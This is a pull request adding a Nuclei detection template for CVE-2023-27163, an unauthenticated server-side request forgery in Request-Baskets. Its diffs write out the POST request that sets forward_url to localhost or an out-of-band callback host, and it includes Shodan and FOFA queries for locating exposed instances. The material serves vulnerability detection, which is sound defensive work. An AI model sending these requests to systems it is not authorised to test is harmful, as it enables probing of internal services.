### PR TITLE
add CVE-2023-27163 template

### DIFF
--- a/http/cves/2023/CVE-2023-27163.yaml
+++ b/http/cves/2023/CVE-2023-27163.yaml
@@ -5,7 +5,8 @@ info:
   author: Jaenact
   severity: medium
   description: |
-    Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
+    Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url
+    parameter when creating a new basket.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-27163
     - https://github.com/darklynx/request-baskets

--- a/http/cves/2023/CVE-2023-27163.yaml
+++ b/http/cves/2023/CVE-2023-27163.yaml
@@ -1,0 +1,41 @@
+id: CVE-2023-27163
+
+info:
+  name: Request-Baskets <= 1.2.1 - SSRF via forward_url
+  author: Jaenact
+  severity: medium
+  description: |
+    Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-27163
+    - https://github.com/darklynx/request-baskets
+    - https://hub.docker.com/r/darklynx/request-baskets
+    - https://infosecwriteups.com/exploit-analysis-request-baskets-v1-2-1-server-side-request-forgery-ssrf-688fffd1f424
+  tags: cve,ssrf,request-baskets,unauthenticated,http,proxy,golang
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/baskets/{{randstr}}"
+
+    headers:
+      Content-Type: application/json
+
+    body: |
+      {
+        "forward_url": "http://127.0.0.1:80",
+        "proxy_response": true,
+        "insecure_tls": false,
+        "expand_path": true,
+        "capacity": 250
+      }
+
+    matchers:
+      - type: status
+        status:
+          - 201
+
+      - type: word
+        part: body
+        words:
+          - "token"

--- a/http/cves/2023/CVE-2023-27163.yaml
+++ b/http/cves/2023/CVE-2023-27163.yaml
@@ -1,42 +1,67 @@
 id: CVE-2023-27163
 
 info:
-  name: Request-Baskets <= 1.2.1 - SSRF via forward_url
+  name: Request-Baskets <= 1.2.1 - Server Side Request Forgery
   author: Jaenact
   severity: medium
   description: |
-    Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url
-    parameter when creating a new basket.
+    Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-27163
     - https://github.com/darklynx/request-baskets
     - https://hub.docker.com/r/darklynx/request-baskets
     - https://infosecwriteups.com/exploit-analysis-request-baskets-v1-2-1-server-side-request-forgery-ssrf-688fffd1f424
-  tags: cve,ssrf,request-baskets,unauthenticated,http,proxy,golang
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-27163
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2023-27163
+    cwe-id: CWE-918
+    cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: darklynx
+    product: request-baskets
+    shodan-query: http.title:"Request-Baskets"
+    fofa-query: title="Request-Baskets"
+  tags: cve,cve2023,ssrf,request-baskets,oast,proxy
+
+flow: http(1) && http(2)
+
+variables:
+  bucketname: "{{rand_base(7)}}"
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/api/baskets/{{randstr}}"
+  - raw:
+      - |
+        POST /api/baskets/{{bucketname}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
 
-    headers:
-      Content-Type: application/json
-
-    body: |
-      {
-        "forward_url": "http://127.0.0.1:80",
-        "proxy_response": true,
-        "insecure_tls": false,
-        "expand_path": true,
-        "capacity": 250
-      }
+        {
+          "forward_url": "http://{{interactsh-url}}",
+          "proxy_response": true,
+          "insecure_tls": false,
+          "expand_path": true,
+          "capacity": 250
+        }
 
     matchers:
-      - type: status
-        status:
-          - 201
+      - type: dsl
+        dsl:
+          - 'status_code == 201'
+          - 'contains(body, "token\":")'
+          - 'contains(content_type, "application/json")'
+        condition: and
+        internal: true
 
+  - raw:
+      - |
+        GET /{{bucketname}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
       - type: word
-        part: body
+        part: interactsh_protocol
         words:
-          - "token"
+          - "http"

--- a/http/cves/2023/CVE-2023-27163.yaml
+++ b/http/cves/2023/CVE-2023-27163.yaml
@@ -22,8 +22,8 @@ info:
     max-request: 2
     vendor: darklynx
     product: request-baskets
-    shodan-query: http.title:"Request-Baskets"
-    fofa-query: title="Request-Baskets"
+    shodan-query: http.html:"Request-Baskets"
+    fofa-query: body="Request-Baskets"
   tags: cve,cve2023,ssrf,request-baskets,oast,proxy
 
 flow: http(1) && http(2)


### PR DESCRIPTION
### Template / PR Information

- Added detection template for CVE-2023-27163 (Request-Baskets <= 1.2.1)

Unauthenticated SSRF via the `forward_url` parameter in basket creation. Exploitable by crafting a POST request to `/api/baskets/{name}`. 
Triggers server-side request to arbitrary hosts.

- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2023-27163
  - https://github.com/darklynx/request-baskets
  - https://hub.docker.com/r/darklynx/request-baskets
  - https://infosecwriteups.com/exploit-analysis-request-baskets-v1-2-1-server-side-request-forgery-ssrf-688fffd1f424

### Template Validation

I've validated this template locally:
- [x] YES
- [ ] NO

#### Additional Notes

Tested with:
```bash
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
nuclei -t http/cves/2023/cve-2023-27163.yaml -u http://localhost:55555 -debug
```

Detection result:
```
HTTP/1.1 201 Created
Content-Type: application/json
{"token":"..."}
Matched:
[cve-2023-27163:status-1] [cve-2023-27163:word-2]
```

### Additional References

- https://nuclei.projectdiscovery.io/templating-guide/
- https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers
- https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md